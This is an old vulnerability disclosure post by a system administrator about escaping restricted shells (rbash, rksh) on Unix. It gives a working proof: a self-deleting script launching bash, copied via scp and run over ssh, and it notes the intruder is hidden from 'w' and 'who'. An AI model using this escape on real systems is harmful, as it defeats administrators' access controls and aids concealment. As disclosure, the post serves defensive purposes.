Restricted Shells

I have recently realized a security issue in some

of the restricted shells on *NIX systems. I am not

sure if I am the first one to discover the problem

I am going to discuss but I am sure that it has

not been posted yet, atleast not that I know of.

Basically this is the issue:

Affected Systems:

=================

Any Unix systems that I am aware of using

restricted shells (rbash, rksh)

Description:

============

An authorized user is that is set to use rbash or

rksh is able to escape the restricted shell

environment and then furthermore exploit the

system. The problem comes from the fact thatwhen a

command is executed from the shell and it is found

to be a shell procedure then rksh or rbash are

invoked to execute it.

Proof:

======

One needs to store the shell script in a

world-writable directory like /tmp or /usr/tmp

so let's assume the server is running sshd (This

is also exploitable through rsh). In this case

store in a file called anything you want (I will

use .tmp123) the following:

---

/usr/bin/bash

rm -Rf /tmp/.tmp123

---

Then execute the following:

$scp ./.tmp123 user@host:/tmp

user@host's password:

Done.

$ssh -l user host '/tmp/.tmp123'

user@host's password:

_

You should now have a normal bash shell instead

of the original rbash.

Also a great plus to doing this is that whenever

you follow the procedure above the commands 'w'

and 'who' cannot detect your presence. However

'ps' dows show the intruder's presence.

Fix:

====

I am not aware of any except maybe an attempt to

retune the system. If anyone has any ideas please

e-mail me.

A. Dimitrov

System Administrator

Georgia College & State University